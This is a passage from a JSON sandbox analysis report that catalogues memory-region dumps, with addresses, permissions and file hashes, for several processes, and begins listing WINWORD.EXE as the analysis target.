"ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b2289efbc0e8f48da272acaff5067f2d86a98f90", "sha256_hash": "fb8751229f3cfd85c6872794f0fc4b7c180fb458e84b04c4940241bab7fab96f", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001312-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000007-region_00001312-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_813", "md5_hash": "b2ce333f204f00b221bd31ef3b49afc5", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bda8a8794066326ac3b52e731c484ecfe4e37091", "sha256_hash": "1215d8f3ec668d9e4d2dd38b7ea8667c776c069ba812d1cb9db1ff485bcec8ee", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001313-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000007-region_00001313-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_814", "md5_hash": "024b430aa40f1ea77b9451bceb5bd0b8", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9f3a22ee6a7aacc020f16fabf03463b9c0245469", "sha256_hash": "258306f7a6a03883d8db3e6376c514fc1f39b9757b6ae7adbd52c4ff1104f912", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001315-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000007-region_00001315-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_815", "md5_hash": "6449a85f931924e2a188e45ff4f3a6de", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "43a9e60bd83e618c8eb5538c02e16fd1c3d484bc", "sha256_hash": "30d8a3b212d64fe660360f21971bca3b0811fac6f5588ad98c6db9b7d6f0bea7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001317-addr_0x0000000000350000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000007-region_00001317-addr_0x0000000000350000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_816", "md5_hash": "78d0017980c103e2b6c5fbe4015eb53e", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "65dc5b4be29562c9ed9c0f747c823909ab078a41", "sha256_hash": "a26a56df68ac1f78005ec7a46fe130de4b0f2fb3e6e5d6682f2b148620be9bab", "size": 24576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001324-addr_0x00000000001d0000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000007-region_00001324-addr_0x00000000001d0000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_817", "md5_hash": "8aefe561d296773663b8b2ac847b44e5", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "dc895f8ce412304b8ad7b16a7d73050b77c5851e", "sha256_hash": "c4e090eacece14a53055c5b4090cd455901d8930791bf3c2d6848c46e4ef1808", "size": 16384, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001325-addr_0x0000000000590000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000007-region_00001325-addr_0x0000000000590000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_818", "md5_hash": "4e99d66d93e6af68435253bb1d59a51f", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "eac1b3bf45be0d9dbb6408630bca22e27cbc3d2d", "sha256_hash": "7a7ee90334cc5d079ebbf9fc7ef3349c2baf007f2f497c07556653985844712d", "size": 98304, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001351-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000007-region_00001351-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_819", "md5_hash": "663e0c81aa5e0a3ff2a43da751ac3ea6", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e73f43d3b9108b46aa594a997edc25f4aa778b3a", "sha256_hash": "83341888a1a94ed307472f9945ea15735d3580b3043db1b990ac64f5eda31432", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001352-addr_0x0000000000190000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000007-region_00001352-addr_0x0000000000190000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_820", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001356-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000008-region_00001356-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_821", "md5_hash": "0cc92ea05b255f266465ab640d468d5c", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "53730ecd53b215081815ff653a97c97f26eedacf", "sha256_hash": "b42a63543342ee93118fde1fe1cd92e1290db39ee785bd7bd742dd5fcca2f30d", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001357-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000008-region_00001357-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_822", "md5_hash": "c697ba9a9adee22af6d60bdafa5bc475", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bf6e2bdc95267f185ade18739723f7a764c30b3b", "sha256_hash": "2af163c528fc725189e5ff3932fec81e8133881eb05dcaabf0ce43386e051b0e", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001361-addr_0x0000000000070000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000008-region_00001361-addr_0x0000000000070000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_823", "md5_hash": "1ade59bdec80e9de19a8c4b058478792", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "58e16965fc28118ef249c0d4e94c3edae214827b", "sha256_hash": "e75cd7515381679eee529e0b52ca90ef03fd9bd81578f5ddbe5ab78e6d164e48", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001362-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000008-region_00001362-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_824", "md5_hash": "194a15c7645ff567d29251cc26751cf2", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "439127023cd91e14106a58935784cd60c0e7fa2a", "sha256_hash": "7964402763e15f380490674214edcfc8857fad0a7c76e89c02c298e5b9b94568", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001367-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000008-region_00001367-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_825", "md5_hash": "f4b272dd70637ff91d332d8fcc1ecc7d", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f2b72b3c7e2099f4b92ca19bde88419b99dda81d", "sha256_hash": "30bac2a2217259662de8de528852257084c6e8e81bedee6dca0ce22d8cab5d77", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001368-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001368-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_826", "md5_hash": "4c4d0a9f453116af89e8c42d924db7b5", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ab27024622fda4f29dde7a4d85d2102d9c58e15e", "sha256_hash": "8e9e01987139086d7d09d81e74385d126e6ba90ce08cd285809dd014304b9506", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001369-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001369-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_827", "md5_hash": "5a3e9d8411e5f13c8ae9a469f95ca185", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f98f4498d0cd40292153db318126991c88d10b4f", "sha256_hash": "9f00ef0b8a12308f384a29560bc101bce565b726e097dcded8e446511388c528", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001371-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000008-region_00001371-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_828", "md5_hash": "07cc9d7b634cf2aa682c99a3ed6b0b46", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "17cafc78df9d3c44bf0789cf86e2a34ab239dda5", "sha256_hash": "7857c5a2cfb18fe9442779d03bf297e6cae54b325672416f343c44fa404302dd", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001373-addr_0x0000000000140000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000008-region_00001373-addr_0x0000000000140000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_829", "md5_hash": "a245d2ccf195e846b24aa21fde0c0e0a", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6f865290ab03fe8cac9addb35d501ce1f6384627", "sha256_hash": "321d397e8edba7ec3e67e862fb3a29623158d4cb1d2a5f98869403c6349cc2d9", "size": 524288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001379-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000008-region_00001379-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_830", "md5_hash": "3c8478eadbae214f144c89e6edbb35c3", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "826beaff908432aebf855bd055e3f33e6e453a28", "sha256_hash": "d780aff3dc2535a18286153b63763737ebacc1db86a41f6d90b6bbfd29237a2e", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001381-addr_0x0000000000690000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000008-region_00001381-addr_0x0000000000690000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_831", "md5_hash": "5063fa8176c5ea21d0e84bd53bb2070a", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ab4aa997d0c4d7e76d12486b41d5bd4d126f6129", "sha256_hash": "2ddd69582df19afbcd027990186191942cccaf7211b52da7282f5b2d4487ae35", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001397-addr_0x0000000076dc0000-size_0x00000000000fa000-perm_rwx.bin", "filename": "process_00000008-region_00001397-addr_0x0000000076dc0000-size_0x00000000000fa000-perm_rwx.bin", "id": "proc_dump_832", "md5_hash": "6eeea0bcbc21bd1c0d7f0d6ae3488f7b", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fad191d56abe255a03a7b4b3b641fcfa8a4f81fe", "sha256_hash": "938a68694e4495227ebc925be61a20adb5c6c82d7dd57cc67a2717e2f9f2bf70", "size": 1024000, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001398-addr_0x0000000076ec0000-size_0x000000000011f000-perm_rwx.bin", "filename": "process_00000008-region_00001398-addr_0x0000000076ec0000-size_0x000000000011f000-perm_rwx.bin", "id": "proc_dump_833", "md5_hash": "caf76e9dd8864dfb7d729847f3595e80", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "71745f0f20bf18b3813fbb1a30eed8d41dc1d51d", "sha256_hash": "f113bc4b90aa0447b7992c2783d7c3b16d63f0e65e2c54c6e93ba833e8e0c667", "size": 1175552, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001407-addr_0x0000000000110000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001407-addr_0x0000000000110000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_834", "md5_hash": "663e0c81aa5e0a3ff2a43da751ac3ea6", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e73f43d3b9108b46aa594a997edc25f4aa778b3a", "sha256_hash": "83341888a1a94ed307472f9945ea15735d3580b3043db1b990ac64f5eda31432", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001408-addr_0x0000000000120000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001408-addr_0x0000000000120000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_835", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001412-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000009-region_00001412-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_836", "md5_hash": "26316db462d893df3296ba273328ebba", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "dc3943c271b82915b459a4231e7dc7e0cb29f3da", "sha256_hash": "74c64aae9ecfcfdb0f8b7346da8d6565f7a08a269b6f37094094739ea1df218b", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001413-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000009-region_00001413-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_837", "md5_hash": "ca5689c19d2bb2392edc09372ed6a8f3", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2cfce1557dabf39ee82aa771558bafff85665d16", "sha256_hash": "f6e9310e213f52412dc17b4da0e4dfdef6bffb1411c79f7b9df3404e470cb211", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001423-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000009-region_00001423-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_838", "md5_hash": "077206dee0f7cd67c619930f012d5f6b", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ab13229b8b65fc4060350c3279990aca16ac5b67", "sha256_hash": "fab8367d584539cd78820e2de596ae243572c8af7293159ff892df1a830eb028", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001424-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001424-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_839", "md5_hash": "383391b0ea3842df8285a8ed9abf0a56", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8a5229f80345c2cc9c64a79774fbce6e8e5e5b36", "sha256_hash": "4153b70cfa359c8d51f72e88d612ccc100f12333ea0f6cbe2ab9445aaeb9aeb9", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001425-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001425-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_840", "md5_hash": "95c3d256dacba863c6c848aedb91008c", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a97f9ed3b82d62c5c6ddd65a7ce3ae9e7b774804", "sha256_hash": "e23ae3a55a053d1985c63eba2ea23863dbfc6777cc43185ced50ff1e3a1b2d12", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001427-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000009-region_00001427-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_841", "md5_hash": "5ea135e969d2a57e37977fc404b10055", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "677ca26b74bcef26ed05b5b09de8a4aee62042d2", "sha256_hash": "de01a20619059cfc38ac2ad09eeb5fd757c05e2d9262ec52db2fa28d8b2e0205", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001429-addr_0x0000000000100000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000009-region_00001429-addr_0x0000000000100000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_842", "md5_hash": "efaf6ac7b5ff8a7adbd940848a9c6528", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ebb39a6d3a2a7879cfa394f20aa1b2800611521b", "sha256_hash": "413dff1420a8782b4169f3490cdb7f2e20956e6695f9ce6b424089160e27cc8a", "size": 24576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001435-addr_0x0000000000220000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001435-addr_0x0000000000220000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_843", "md5_hash": "e01b925ea47bcdf21ab1b5d894b7b274", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4fd633ed9821d997167ffcb57c8f88a43346a856", "sha256_hash": "d473f9456fe05667381e8cce3d609e3d83d2ed3dbc3af573f0eac998601094de", "size": 90112, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001437-addr_0x00000000004d0000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000009-region_00001437-addr_0x00000000004d0000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_844", "md5_hash": "9f91dce872700678c9a39bedd4188361", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8e2c4d3f1cc1dda309205745100596870c8493e1", "sha256_hash": "9407fe01be7fadd16e34e428ad0eacd530b8c9bbce6d47616172196bd9f6d63d", "size": 16384, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001463-addr_0x00000000000d0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001463-addr_0x00000000000d0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_845", "md5_hash": "663e0c81aa5e0a3ff2a43da751ac3ea6", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e73f43d3b9108b46aa594a997edc25f4aa778b3a", "sha256_hash": "83341888a1a94ed307472f9945ea15735d3580b3043db1b990ac64f5eda31432", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001464-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001464-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_846", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001469-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000010-region_00001469-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_847", "md5_hash": "3baadb06fedbb8dc0a504f72bcb138c4", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "dd5422d5090abbc55e10ffb8841cf7996834208f", "sha256_hash": "3fe9fc461fb88741626206afbc5fd8e57b91362b87c8250bc95db315664e901d", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001470-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000010-region_00001470-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_848", "md5_hash": "99725737f4ac9a16736e95bc62a5f35f", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2787a3d9845609c753ae439b24d7c0fccab0beb0", "sha256_hash": "956cfc7d436f616b27d0c9d1fe3bd615e84236e4bebf4095c55d0dc3feb07370", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001474-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000010-region_00001474-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_849", "md5_hash": "dc72d9dc7ae844a63504263f8c636964", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "602e2a37ff1f1bd5d05c8d2476804f7822ea9d8e", "sha256_hash": "cacf9f1564aae89cee1550240d46c44e5275e5925a658b218ac48b6cf1599bbe", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001476-addr_0x0000000000280000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000010-region_00001476-addr_0x0000000000280000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_850", "md5_hash": "f7f4cc90b9a2cbedb5077f1612683b69", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "60019e07c5f162583853994e70c918a062fe10f1", "sha256_hash": "313fdd987a6989a0b0bab09a4a78c6d513f71f6123c9ba1f4314e56a7def7b41", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001480-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000010-region_00001480-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_851", "md5_hash": "8c10353868676b9c72f5fbd99e430caa", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2af5f83aa56537bf2f7428e495aba3155393d2d6", "sha256_hash": "872cbbc522d483f4563c2e987448af090d7b7ec840f3afcfdb8db4285d43ad16", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001481-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001481-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_852", "md5_hash": "f019e5fd7656a034a29a5c423a169d68", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c0e470161827493277cd793cd81563ec53e34164", "sha256_hash": "4f1570831fec992b56a4cbeff8d3ee1fdd83f62d2dafe1bf121fe3d50fae2c8b", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001482-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001482-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_853", "md5_hash": "8e392b3c0fd6bd1b3ffa8d2b7927b254", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "40f898e7e767cb41b80de3ae98f52f0a1d01d4a5", "sha256_hash": "c260547eb42a7b8d5cdeff692162d377edd6b4da2c7e9bcb3d2bb400fee58ccd", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001484-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000010-region_00001484-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_854", "md5_hash": "970219f463fccc571b852cf5fca95eb0", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1d65ab71c9c9ee29bbe4176fa5c3165e67349e84", "sha256_hash": "d8b58bbf7babf35bb51332176d6b92ae87827cbbf00e2bc42d29523c84d4c2e7", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001486-addr_0x0000000000490000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000010-region_00001486-addr_0x0000000000490000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_855", "md5_hash": "5facbbf1947acbbc65c027fc87806f85", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "502e42c40b3f20fc4f0260a7ea5e6eaa793a2537", "sha256_hash": "c7d8f7d93a5e78f5bc99e060e19ec23347c4064f65e6edad5a6a32254f364f6b", "size": 24576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001493-addr_0x0000000000400000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000010-region_00001493-addr_0x0000000000400000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_856", "md5_hash": "9f6c397a16e940632fc373f00d79754f", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8f851c23b502df083bf305ca6ab3ebb57e39f83a", "sha256_hash": "a4878bcf33a1d30eb0af687418e43825ea3c62acb6761d2e226d923926a4645e", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001494-addr_0x00000000006e0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000010-region_00001494-addr_0x00000000006e0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_857", "md5_hash": "56c10bfad1f0f1600adf0b007473f076", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6db8c4b3600227a9decf6697f1f454deaa021783", "sha256_hash": "1bf4421a45008693803d37d56e5ba1cc9234cd766b6a0f118214f353f195a55b", "size": 86016, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\office14\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_133", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_134", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:10.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not 